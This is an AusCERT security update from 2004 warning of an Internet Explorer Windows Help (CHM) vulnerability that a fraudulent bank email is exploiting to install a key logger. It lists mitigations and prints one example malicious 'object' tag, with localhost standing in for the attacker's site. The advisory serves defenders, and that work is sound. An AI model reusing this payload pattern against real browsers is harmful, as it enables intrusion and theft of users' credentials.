Date: 05 April 2004
References: ESB-2004.0261 ESB-2004.0268 ESB-2004.0278
Click here for printable version
Click here for PGP verifiable version
Please note, the AusCERT Update contained on this page has been
superseded by ESB-2004.0268 (see above for link) which contains
information relating to the patches now available from Microsoft.
-----BEGIN PGP SIGNED MESSAGE-----
AusCERT Update AU-2004.007 - Vulnerability in Internet Explorer Allows
05 April 2004
A vulnerability in the handling of "Windows Help" files by Internet
Explorer allows the remote execution of arbitrary code on a local computer
by a malicious web site. This vulnerability is currently being exploited
against Australian users using the bogus bank email reported in AusCERT
Following the link supplied in the message will initiate the execution of
the malicious key logger program on the user's computer. A more detailed
breakdown of the actions taken by this combination of fraudulent email and
malicious trojan is at:
Details of the showHelp() vulnerability are available in Secunia advisory:
At this time, AusCERT is not aware of a Microsoft patch for this
AusCERT recommends that users of Internet Explorer avoid visiting web sites
of untrusted origin, or avoid completely the use of Internet Explorer,
until a patch is available from Microsoft. In any case, following links
in unsolicited email messages should be actively discouraged.
The current version of the key logging program sends the captured
information via e-mail to firstname.lastname@example.org. Blocking outbound email
to this address may be effective for this instance, but future versions
of the trojan are likely to use a different email address.
Removing the file type association for CHM files should prevent the
exploit, however this will effectively disable Windows Help.
System administrators with the ability to filter web traffic through a
proxy may be able to block access to pages referencing the affected object
tags which enable the exploit.
Example of a malicious "object" tag (with "localhost" substituted for the
malicious site URL):
object data="ms-its: mhtml:file://C:\test.mhtml!http://localhost//bad.chm::/bad.html"
(the local file, C:\test.mhtml, does not exist)
The object tags used to exploit the vulnerability include:
AusCERT is aware of independent reports that disabling these protocol
handlers in the Windows registry may also prevent infection, but may also
have undesirable side-effects, including system restarting. AusCERT advise
that any actions of this nature should be taken only at the discretion of
your site, and only after isolated testing.
Anti-virus software and personal firewalls may be helpful in preventing
initial execution of the trojan (if file execution protection is available
and enabled), and in alerting the user of outbound connections by the email
component of the key logger.
The AusCERT Team
Australian Computer Emergency Response Team
The University of Queensland
Internet Email: email@example.com
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
-----BEGIN PGP SIGNATURE-----
-----END PGP SIGNATURE-----